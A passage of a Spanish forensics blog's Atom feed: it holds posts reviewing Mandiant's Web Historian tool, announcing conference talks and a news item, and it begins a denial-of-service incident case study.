src='https://blogger.googleusercontent.com/tracker/6583475030409211074-3348530537760533413?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/3348530537760533413/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=3348530537760533413' title='4 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/3348530537760533413'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/3348530537760533413'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/08/que-cosas-me-pasan.html' title='Que cosas me pasan...'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_7dOLVYBL8vA/TG1UXnZKQQI/AAAAAAAACQs/kx0HuUorHvQ/s72-c/Captura.JPG' height='72' width='72'/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-1083080049413189870</id><published>2010-08-09T14:38:00.000+02:00</published><updated>2010-08-09T14:38:42.316+02:00</updated><title type='text'>Web Historian</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://www.mandiant.com/images/uploads/webhistorian-logo2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://www.mandiant.com/images/uploads/webhistorian-logo2.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Hola lectores,&lt;br /&gt;&lt;br /&gt;Hace mucho tiempo que voy siguiendo la evolución de la empresa MANDIANT que dispone de muchos productos curiosos y productos FREE de lo más interesantes.&lt;br /&gt;&lt;br /&gt;Hoy quiero hablar de una herramienta que me ha ayudado en la búsqueda de evidencias forenses en la navegación web y que es de una ayuda incalculable&amp;nbsp; (¡¡ Bravo por los chicos de MANDIANT !!)&lt;br /&gt;&lt;br /&gt;Ni que decir tiene existen muchas herramientas en modo comando como 'pasco' o 'galleta', pero he seleccionado esta por su sencillez y rapidez a la hora de elaborar un informe forense.&lt;br /&gt;&lt;br /&gt;Estamos hablando de &lt;b&gt;Web Historian&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span title=""&gt;Web  Historian es un programa que permite a un investigador reunir,  mostrar y analizar datos de la navegación que se haya producido en un equipo. &lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;Más allá de esta  simple definición, la herramienta ofrece una interfaz  gráfica pero simplista de ver y navegar con grandes volúmenes de  datos.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span style="background-color: white;" title=""&gt; &lt;/span&gt;&lt;span title=""&gt;Tal vez la  característica más potente es la capacidad de relacionar y ofrecer  múltiples puntos de vista de los datos (incluyendo gráficos y línea de  tiempo) a través del analizador y la herramienta web de perfiles, con la  esperanza de que los investigadores podamos llegar a conclusiones acerca de los datos que nos proporciona.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span title=""&gt;En la siguiente imágen podemos apreciar la cantidad de navegadores que soporta&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_7dOLVYBL8vA/TF_VPyIt3FI/AAAAAAAACPo/7VU2SD4QStc/s1600/scan.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="268" src="http://2.bp.blogspot.com/_7dOLVYBL8vA/TF_VPyIt3FI/AAAAAAAACPo/7VU2SD4QStc/s400/scan.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span title=""&gt;Una vez que pulsamos el boton de 'start' comienza el escaneo del equipo en busca de la información de navegación, también es interesante resaltar que podemos copiar los ficheros de historico de otro equipo al que previamente hemos clonado y obtenido sus huellas, para posteriormente tratarlo en el equipo del investigador con el objeto de no alterar posibles pruebas.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span title=""&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span title=""&gt;&lt;br /&gt;Esta pantalla es el resultado del escaneo: (se han tapado datos por motivos de confidencialidad)&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span title=""&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_7dOLVYBL8vA/TF_mY1RHXhI/AAAAAAAACPw/Wlb1jNd0HWc/s1600/webhistory.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="136" src="http://4.bp.blogspot.com/_7dOLVYBL8vA/TF_mY1RHXhI/AAAAAAAACPw/Wlb1jNd0HWc/s400/webhistory.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span title=""&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span title=""&gt;Desde ella podemos filtrar, en busca de objetos, imágenes, campos ocultos, etc. Como se puede apreciar dispone de muchos de ellos ya predefinidos y también podemos crearnos los nuestros.&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;&lt;/span&gt;&lt;span title=""&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="long_text" id="result_box"&gt;&lt;/span&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span title=""&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span title=""&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_7dOLVYBL8vA/TF_svHnKh6I/AAAAAAAACP4/uibr5Aods3g/s1600/filtro_por__formularios.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="32" src="http://4.bp.blogspot.com/_7dOLVYBL8vA/TF_svHnKh6I/AAAAAAAACP4/uibr5Aods3g/s400/filtro_por__formularios.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_7dOLVYBL8vA/TF_tJaX3UsI/AAAAAAAACQA/Gxk8KEjpbO0/s1600/filtros.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="277" src="http://2.bp.blogspot.com/_7dOLVYBL8vA/TF_tJaX3UsI/AAAAAAAACQA/Gxk8KEjpbO0/s400/filtros.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span title=""&gt;Otra  de las carácterisiticas importantes es la obtención de miniaturas ya  algunos  navegadores graban una instantánea de la imagen de las páginas  web que se han accedido. &lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;Actualmente,  Chrome y Safari son los únicos navegadores que recogen imágenes  en miniaturas.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span style="background-color: white;" title=""&gt; &lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;Para ver las  miniaturas, disponemos de la ficha "thumbnails".&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span style="background-color: white;" title=""&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_7dOLVYBL8vA/TF_vC3kNdOI/AAAAAAAACQI/hP0Dn_vaN2M/s1600/miniaturas.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="283" src="http://2.bp.blogspot.com/_7dOLVYBL8vA/TF_vC3kNdOI/AAAAAAAACQI/hP0Dn_vaN2M/s400/miniaturas.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span style="background-color: white;" title=""&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;b&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span title=""&gt;Website  Analyzer&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span title=""&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;El analizador de sitios web es una representación gráfica muy útil para reducir el tiempo  de análisis de grandes conjuntos de datos del historial web con  estadísticas e informes visuales.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span style="background-color: white;" title=""&gt; &lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;Para iniciarlo tenemos en  Herramientas-&amp;gt; Analizar, en esta versión de momento hay  cuatro informes que se pueden ejecutar sobre los datos. &lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;Para ejecutar un  informe, primero debemos cargar los datos del historial web. &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span style="background-color: white;" title=""&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span style="background-color: white;" title=""&gt; &lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span style="background-color: white;" title=""&gt;Cualquier informe generado o gráficos se pueden  guardar como una imagen PNG para su inclusión en un informe externo.&lt;/span&gt;&lt;span style="background-color: white;" title=""&gt;Los informes que puede generar son variados, por ejemplo el circular por dominio permite ver&lt;/span&gt;&lt;span style="background-color: white;" title=""&gt; la frecuencia de visita de cada sitio web en  el conjunto de datos, y el de línea de tiempo es perfecto para ver la frecuencia por horas.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_7dOLVYBL8vA/TF_x-24ImQI/AAAAAAAACQY/nYNXgbvN1yU/s1600/lineatiempo.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="305" src="http://1.bp.blogspot.com/_7dOLVYBL8vA/TF_x-24ImQI/AAAAAAAACQY/nYNXgbvN1yU/s400/lineatiempo.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span style="background-color: white;" title=""&gt;&amp;nbsp;Y por último otra de las grandes utilidades es el Web Profiler, que permite disponer de una visión completa del sitio visitado.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_7dOLVYBL8vA/TF_ztkddcYI/AAAAAAAACQg/dPZXm1_7NRw/s1600/profiler.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="341" src="http://1.bp.blogspot.com/_7dOLVYBL8vA/TF_ztkddcYI/AAAAAAAACQg/dPZXm1_7NRw/s400/profiler.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span style="background-color: white;" title=""&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span style="background-color: white;" title=""&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span style="background-color: white;" title=""&gt;Lo dicho, otra herramienta (gratuita) que debemos de tener en nuestra caja de herramientas.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span style="background-color: white;" title=""&gt;Podemos descargarnos esta utilidad desde la web de MANDIANT desde aquí :&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span style="background-color: white;" title=""&gt;&amp;nbsp;&lt;/span&gt;&lt;a href="http://www.mandiant.com/products/free_software/web_historian/"&gt;&lt;span title=""&gt;http://www.mandiant.com/products/free_software/web_historian/&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;span class="long_text" id="result_box"&gt;&lt;span title=""&gt; &lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-1083080049413189870?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/1083080049413189870/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=1083080049413189870' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/1083080049413189870'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/1083080049413189870'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/08/web-historian.html' title='Web Historian'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_7dOLVYBL8vA/TF_VPyIt3FI/AAAAAAAACPo/7VU2SD4QStc/s72-c/scan.JPG' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-4108773137396019242</id><published>2010-08-03T15:15:00.000+02:00</published><updated>2010-08-03T15:15:54.120+02:00</updated><title type='text'>Buena noticia</title><content type='html'>&amp;nbsp;Muy bien por la Ertzaintza!!!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_7dOLVYBL8vA/TFgVhqSV8bI/AAAAAAAACPQ/LbfZeyqO3vU/s1600/otros.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/_7dOLVYBL8vA/TFgVhqSV8bI/AAAAAAAACPQ/LbfZeyqO3vU/s320/otros.JPG" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;h2 style="color: #3f5974; font-family: Arial, Helvetica, sans-serif; font-size: 32px; letter-spacing: -1px; line-height: 1.1em; margin-bottom: 8px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;br /&gt;&lt;/h2&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;"&gt;Desde primeras horas de la madrugada de hoy, martes, agentes de la División Antiterrorista y &lt;b&gt;de Información de la Ertzaintza&lt;/b&gt; desarrollan un operativo contra la organización terrorista ETA en la localidad guipuzcoana de Hernani. Fruto del mismo ha sido la detención de dos presuntos terroristas a los que, entre otros actos delictivos, se les imputa su participación en el asesinato de Joseba Pagazaurtundua, en febrero de 2003.&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;"&gt;Visto en:&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-family: verdana, Arial, Helvetica, sans-serif; font-size: 12px; line-height: 20px;"&gt;&lt;a href="http://www.ertzaintza.net/public/wps/portal/ertzaintza"&gt;http://www.ertzaintza.net/public/wps/portal/ertzaintza&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-4108773137396019242?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/4108773137396019242/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=4108773137396019242' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/4108773137396019242'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/4108773137396019242'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/08/buena-noticia.html' title='Buena noticia'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_7dOLVYBL8vA/TFgVhqSV8bI/AAAAAAAACPQ/LbfZeyqO3vU/s72-c/otros.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-7434159473390754793</id><published>2010-07-12T08:29:00.002+02:00</published><updated>2010-07-12T08:31:33.936+02:00</updated><title type='text'>Nos vamos a Almería</title><content type='html'>&lt;div align="left" class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_7dOLVYBL8vA/TDq2G64dBRI/AAAAAAAAB68/uYX7wj8agBc/s1600/seguridad-web.jpg" imageanchor="1" style="clear: left; cssfloat: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" rw="true" src="http://1.bp.blogspot.com/_7dOLVYBL8vA/TDq2G64dBRI/AAAAAAAAB68/uYX7wj8agBc/s200/seguridad-web.jpg" width="183" /&gt;&lt;/a&gt;&lt;/div&gt;La Universidad de Almería lleva acabo, del 12 al 16 de Julio, el curso de verano "Seguridad en entornos Web. E-Comercio y E-Administración", un curso dirigido tanto a alumnos con perfil técnico, como a alumnos de la rama de economía, empresariales y derecho.&lt;br /&gt;&lt;br /&gt;En este curso participaran tanto profesores de la Universidad de Almería como expertos ajenos a la misma.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;El Objetivo del curso es poner en conocimiento las actuaciones del Estado en materia de Seguridad Informática, mostrando las ventajas e inseguridades actuales&amp;nbsp;a las que se expone un usuario&lt;br /&gt;&lt;br /&gt;Yo aportare mi granito con una conferencia sobre "Autopsia de una intrusión y seguridad en Banca Electrónica por Internet".&lt;br /&gt;&lt;br /&gt;&lt;a href="http://nevada.ual.es:81/cursosverano/2010/index.php?option=com_content&amp;amp;view=article&amp;amp;id=62:seguridad-en-entornos-web-e-comercio-y-e-administracion&amp;amp;catid=36:vicar&amp;amp;Itemid=73"&gt;Aquí&lt;/a&gt; hay más información&lt;br /&gt;&lt;br /&gt;Y me han dicho que esta muy bueno el bacalao al estilo Almeriense. ¿será verdad? ;-)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-7434159473390754793?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/7434159473390754793/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=7434159473390754793' title='1 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/7434159473390754793'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/7434159473390754793'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/07/nos-vamos-almeria.html' title='Nos vamos a Almería'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_7dOLVYBL8vA/TDq2G64dBRI/AAAAAAAAB68/uYX7wj8agBc/s72-c/seguridad-web.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-8290331937335651387</id><published>2010-07-06T09:48:00.000+02:00</published><updated>2010-07-06T09:48:44.971+02:00</updated><title type='text'>Nos vamos a Valencia...</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/_7dOLVYBL8vA/TDLe4jx4Y1I/AAAAAAAAB60/GAOmz2MZ6iY/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/_7dOLVYBL8vA/TDLe4jx4Y1I/AAAAAAAAB60/GAOmz2MZ6iY/s320/Captura.JPG" /&gt;&lt;/a&gt;&lt;/div&gt;Al curso de verano.&lt;br /&gt;&lt;br /&gt;Tras realizar las dos ediciones anteriores en Salamanca, este año, de la mano de la &lt;strong&gt;Universidad                      Europea de Madrid&lt;/strong&gt;, y merced a la  colaboración con el                    Máster Universitario en Seguridad de las Tecnologías de  la                     Información y las Comunicaciones , tendrá lugar  en &lt;b&gt;Valencia&lt;/b&gt; durante                     los días 6, 7 y 8 de Julio.&lt;br /&gt;&lt;br /&gt;Yo aportaré mi granito de arena el día 7 con la conferencia "Analisis forense en una fuga de datos".&lt;br /&gt;&lt;br /&gt;Y degustare eso que dicen del agua de Valencia, con la sed que llevo ;-)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-8290331937335651387?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='related' href='http://www.informatica64.com/iiicursoverano/index.html' title='Nos vamos a Valencia...'/><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/8290331937335651387/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=8290331937335651387' title='3 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/8290331937335651387'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/8290331937335651387'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2010/07/nos-vamos-valencia.html' title='Nos vamos a Valencia...'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_7dOLVYBL8vA/TDLe4jx4Y1I/AAAAAAAAB60/GAOmz2MZ6iY/s72-c/Captura.JPG' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-1858071773234302197</id><published>2010-06-10T12:56:00.004+02:00</published><updated>2010-06-10T16:10:32.121+02:00</updated><title type='text'>¡¡ Que vienen los Zombis !!  (Historia de una denegación de servicio)</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/_7dOLVYBL8vA/TBDyDlTkJ_I/AAAAAAAAB6Q/EQtXXLgeepc/s1600/Captura.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="86" src="http://1.bp.blogspot.com/_7dOLVYBL8vA/TBDyDlTkJ_I/AAAAAAAAB6Q/EQtXXLgeepc/s200/Captura.JPG" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;Hola lectores,&lt;br /&gt;&lt;br /&gt;Voy a comentar algo que nos puede suceder a todos, &lt;b&gt;una denegación de servicio&lt;/b&gt;.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;El caso es el siguiente, empresa suministradora de productos de recambios de automóvil, tiene un servicio web (en PHP) de seguimiento de pedidos y comercio electrónico. Desde hace un tiempo parece que el servicio que prestan se degrada, haciendo imposible el acceso a la web. &lt;br /&gt;&lt;br /&gt;&lt;b&gt;Viernes 4 de Junio (15:30h)&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;El servidor web empieza a ir excesivamente lento, parece que va mal la aplicación web. Los informáticos restablecen el servicio.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Lunes 7 de Junio &lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Parece que el servidor no muestra el contenido de su web o parece que tarda en exceso en servir las páginas, parece que está caido. Tras comprobar que la máquina está bien, se ve que contiene multiples instancias del servidor web apache. Tras reiniciarlo al momento vuelve a tener problemas de carga. Esto se mantiene prácticamente durante todo el día.&lt;br /&gt;&lt;br /&gt;&lt;b&gt;Martes 8 de Junio&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;b&gt;8:30h &lt;/b&gt;.- El servidor sigue sin señales de vida, se precisa con urgencia que el servidor este activo, dado que la mayoria de los pedidos se realiza por comercio electrónico. Gran tensión en el departamento comercial y de compras. Se llega a la conclusión que desconectando el cable de red (el de internet) la aplicación funciona correctamente en localhost&lt;br /&gt;&lt;br /&gt;&lt;b&gt;9:30h&lt;/b&gt;.- Analizamos lo sucedido:&lt;br /&gt;&lt;br /&gt;Aplicación a medida de comercio electrónico en PHP con LAMP, todo monitorizado con Nagios y Awstats.&lt;br /&gt;&lt;br /&gt;Empezamos con lo que me dan, analizando las estadisiticas. Podemos ver que efectivamente hay un considerable aumento&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/_7dOLVYBL8vA/TA5dpcaEo_I/AAAAAAAAB4Y/Bb7Xji9_1n4/s1600/Captura.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="49" src="http://2.bp.blogspot.com/_7dOLVYBL8vA/TA5dpcaEo_I/AAAAAAAAB4Y/Bb7Xji9_1n4/s640/Captura.JPG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Mas cuando nos indican que el pico más alto de visitas es de unos 300 diarios, en el peor de los casos.&lt;br /&gt;&lt;br /&gt;Si vemos la memoria de la máquina comprobamos que esta algo saturada&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/_7dOLVYBL8vA/TA5fh3b4f6I/AAAAAAAAB4g/gRB3ByUAnLE/s1600/graph_image.php.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/_7dOLVYBL8vA/TA5fh3b4f6I/AAAAAAAAB4g/gRB3ByUAnLE/s320/graph_image.php.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Y si vemos el tráfico de red, ni que decir tiene&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a 